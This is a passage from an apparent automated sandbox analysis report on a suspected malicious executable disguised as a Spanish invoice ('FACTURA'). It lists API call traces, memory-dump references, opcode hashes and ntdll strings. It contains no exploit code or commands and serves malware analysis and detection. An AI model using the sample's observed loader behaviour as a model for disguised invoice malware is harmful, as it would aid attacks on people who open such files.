                                                                                                                                                                                                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402EAD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FACTURA A-7507_H1758.exe,C:\Users\user\Desktop\FACTURA A-7507_H1758.exe,80000000,00000003), ref: 00405B84
                                                                                                                                                                                                                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402EAD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\FACTURA A-7507_H1758.exe,C:\Users\user\Desktop\FACTURA A-7507_H1758.exe,80000000,00000003), ref: 00405B94
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CharPrevlstrlen
                                                                                                                                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26345910476.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26345861444.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26345958604.0000000010003000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26346002793.0000000010005000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Global$Free$Alloc
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CC8
                                                                                                                                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CE0
                                                                                                                                                                                                                          • CharNextA.USER32(00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CF1
                                                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405F99,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CFA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000000.00000002.26330408731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330333640.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330470737.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330541639.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          • Associated: 00000000.00000002.26330990529.000000000044F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 190613189-0
                                                                                                                                                                                                                          • Opcode ID: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
                                                                                                                                                                                                                          • Instruction ID: b09c91cad7c2282b041c35ea214dbdd3f15ee75aa50bf55fe933874c09a5e2ef
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d13a305aa79855a3845d1893bd1e44018cb4e3b8a4cc5142433a7699c001be6c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BFF0F631104954FFD702DFA5DD04E9FBBA8EF06350B2180BAE841F7210D674DE01ABA8

                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                          Execution Coverage:0%
                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                          Signature Coverage:100%
                                                                                                                                                                                                                          Total number of Nodes:1
                                                                                                                                                                                                                          Total number of Limit Nodes:0
                                                                                                                                                                                                                          execution_graph 72967 35472b90 LdrInitializeThunk

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 2 354734e0-354734ec LdrInitializeThunk
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: ef2ce8c260cfedfcde983537d5cfe94f7b439375844fa834935f2b3c2dfcbe34
                                                                                                                                                                                                                          • Instruction ID: 00febf1a2ddbc7f05cfb8202ddf8b0fe02c80639f257e412af445f71e52e99d5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef2ce8c260cfedfcde983537d5cfe94f7b439375844fa834935f2b3c2dfcbe34
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D990023160510442D50462584614706201547D1201FA1CC56A0414528DC7A6895575A2

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 1 35472d10-35472d1c LdrInitializeThunk
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: eca7398f017d1bd1d47a4d6701e8560cd29cf485d015c400c4a2b4e659891515
                                                                                                                                                                                                                          • Instruction ID: 7b7174cf9d950fa00f3d8632825ff275a21e33fcf48cb3f452c4f1cead6e940e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eca7398f017d1bd1d47a4d6701e8560cd29cf485d015c400c4a2b4e659891515
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F090023120100453D51562584604707101947D1241FD1CC57A0414518DD6678956B121

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 0 35472b90-35472b9c LdrInitializeThunk
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                          • Opcode ID: e8417fb806954cb4136a7a6b47f154f0355d25ba3f197098ead864e63d2b8122
                                                                                                                                                                                                                          • Instruction ID: 00fa9a03536d2b1dca2925ce2ce38e561272ce60b4f64c47e95835daadc6342d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8417fb806954cb4136a7a6b47f154f0355d25ba3f197098ead864e63d2b8122
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9790023120108842D5146258850474A101547D1301F95CC56A4414618DC6A688957121
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                          • API String ID: 0-2160512332
                                                                                                                                                                                                                          • Opcode ID: 5108e54571763549f83eac1797b4d06e5884715fcacda53eb1cff3f0385b348f
                                                                                                                                                                                                                          • Instruction ID: 49d57d3bbc6e097df388a2264a5aea0b3bf0e3b6754eab426b2b14c333af4d20
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5108e54571763549f83eac1797b4d06e5884715fcacda53eb1cff3f0385b348f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5B928DB560C341ABEB29CF20C880F5BB7E9BB84750F40495DFA95D7250DBB0E945CBA2

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: $ $0
                                                                                                                                                                                                                          • API String ID: 3446177414-3352262554
                                                                                                                                                                                                                          • Opcode ID: 1c964a6d16f20add045201aa388390012ee096396360534a85246f3fc431f7a8
                                                                                                                                                                                                                          • Instruction ID: 7d2dde6f9d2b517496420582784908ed1703d79c3ffeb04ee7e10172ae7f1522
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c964a6d16f20add045201aa388390012ee096396360534a85246f3fc431f7a8
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 583200B16083818FE354CF68C894B9AFBF5BB88744F00492EF999C7352D774E9498B52

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                                                                                                          • API String ID: 3446177414-1700792311
                                                                                                                                                                                                                          • Opcode ID: d7c2733b8f2ce2ed86905fac97e56d8d7517a707755ebecf5eba931f97bf1bac
                                                                                                                                                                                                                          • Instruction ID: d9870d1b1fdd887c92d52be1a39ff0a1850c4c6ab23ef19ee02389bc6bcb3c53
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d7c2733b8f2ce2ed86905fac97e56d8d7517a707755ebecf5eba931f97bf1bac
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0D1FD35614685EFCB0ACFA4D450AA9FBF2FF09701F08849EE459AB352DB35A942CF10
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$h.E5
                                                                                                                                                                                                                          • API String ID: 0-2231611123
                                                                                                                                                                                                                          • Opcode ID: 2e771b5b5c1f15647a025c937b959b5203f35bf73cda1c604e7956059b72e856
                                                                                                                                                                                                                          • Instruction ID: b166edab3a1a8f6ea597572ab38d55818d3265cbda111d9980d856895ececa4e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e771b5b5c1f15647a025c937b959b5203f35bf73cda1c604e7956059b72e856
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5DB17AB290C3619FD719CE24C440B5BB7E8BF88754F42496EF895A7340DBB0D94A8B92
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                                                                                                          • API String ID: 3446177414-1745908468
                                                                                                                                                                                                                          • Opcode ID: 978f2129d9048adac6d522bb21e3ae641a1c2b6090a1c3c086424ab0c201a8ef
                                                                                                                                                                                                                          • Instruction ID: fee2e3d4398de87c6af51c8936a811349a25a70f171fcc150911839529956178
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 978f2129d9048adac6d522bb21e3ae641a1c2b6090a1c3c086424ab0c201a8ef
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF91CC75A04744AFDB19CFA4C860A9DFBF2FF49710F15809EE845AB352CB769941CB10
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 3542D202
                                                                                                                                                                                                                          • @, xrefs: 3542D24F
                                                                                                                                                                                                                          • @, xrefs: 3542D09D
                                                                                                                                                                                                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 3542D263
                                                                                                                                                                                                                          • h.E5, xrefs: 3548A5D2
                                                                                                                                                                                                                          • Control Panel\Desktop\LanguageConfiguration, xrefs: 3542D136
                                                                                                                                                                                                                          • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 3542D06F
                                                                                                                                                                                                                          • @, xrefs: 3542D2B3
                                                                                                                                                                                                                          • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 3542D0E6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration$h.E5
                                                                                                                                                                                                                          • API String ID: 0-1285789325
                                                                                                                                                                                                                          • Opcode ID: 7e103ff69ca4e97433c5f9135fc797c34cec1d19bab9f13700a897abda5c7926
                                                                                                                                                                                                                          • Instruction ID: 3c4f62e2498bd332e3a2e93e274896c1278846da89a21c1c7267905d7173fb11
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e103ff69ca4e97433c5f9135fc797c34cec1d19bab9f13700a897abda5c7926
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1A17BB19083559FE329CF21C440B9BB7E8BF84765F01492EF99896240E7B4D949CF93
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlDebugPrintTimes.NTDLL ref: 3545D879
                                                                                                                                                                                                                            • Part of subcall function 35434779: RtlDebugPrintTimes.NTDLL ref: 35434817
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DebugPrintTimes
                                                                                                                                                                                                                          • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                          • API String ID: 3446177414-1975516107
                                                                                                                                                                                                                          • Opcode ID: 687f1d040e50c4a8f8bd6c5135ec59de73686892709db9cb1cd2cf7610463bcb
                                                                                                                                                                                                                          • Instruction ID: 1685e2775ef71dbad6fdf03030df7d943905cb1fefcd052327dda6edf4fb3dea
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 687f1d040e50c4a8f8bd6c5135ec59de73686892709db9cb1cd2cf7610463bcb
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA51CEB5A043459FEB0CCFB4C48479DBBB1BF44724F66459AD811AB381DB70AA86CBD0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                                                                                                                                                          • API String ID: 0-2224505338
                                                                                                                                                                                                                          • Opcode ID: 38fdca8c39aa19a54798b608a35ee372b45731904379bd40d9d97374bfef3e03
                                                                                                                                                                                                                          • Instruction ID: b8f9293f3f5b5dcc82c28d10635cd7267878b815cf956c47b150a34b866887cf
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38fdca8c39aa19a54798b608a35ee372b45731904379bd40d9d97374bfef3e03
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8751BE76625354BFD72DCBA4C8B4E9AF3F4EF046A4F1184AAF401AB712CA729941CE11
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                          • API String ID: 0-523794902
                                                                                                                                                                                                                          • Opcode ID: f2f986c8339e83bb2fc02db3caadbac792858a4958f521bc900d1c4ee714df4e
                                                                                                                                                                                                                          • Instruction ID: 43f687cfc27273f5203bb93b79a68003a825b98c1e5c7bd4a6544eee1ee1ff4e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2f986c8339e83bb2fc02db3caadbac792858a4958f521bc900d1c4ee714df4e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE42EE75209791AFD30DCF24C880A6AB7F5FF88744F8449ADE4858B351DB71E982CB52
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs$h.E5
                                                                                                                                                                                                                          • API String ID: 0-1571450501
                                                                                                                                                                                                                          • Opcode ID: 338cedf3ce980dd938314732b917f44b32c00a4e269feeaad9e727b07c622aa6
                                                                                                                                                                                                                          • Instruction ID: 7a96269fe47ecfa6bd0637dc3c40fd9d044494c99877a9a13c691f614b51ee57
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 338cedf3ce980dd938314732b917f44b32c00a4e269feeaad9e727b07c622aa6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8F15FB6E04219EFDB09CF94C980EEEBBB9FF09650F51446AE515E7210EB709E05CB90
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_35400000_FACTURA A-7507_H1758.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                                                                                          • API String ID: 0-122214566
                                                                                                                                                                                                                          • Opcode ID: 41939baef884a21e5b6349847457041a9ae0ba5bbcea590f628fef9fd35a5ae3
                                                                                                                                                                                                                          • Instruction ID: 4d09f338aa0079ce3b17a1c27361eba9ed1f6962d0ba037dc945d6ba87d8e9a4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41939baef884a21e5b6349847457041a9ae0ba5bbcea590f628fef9fd35a5ae3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1DC126B5A443159BFF0DCB69C881BBEBBB1BF45740F5480A9E802AB390DBB4D945C390
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.26722750004.0000000035400000.00000040.00001000.00020000.00000000.sdmp, Offset: 35400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.0000000035529000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          • Associated: 00000002.00000002.26722750004.000000003552D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
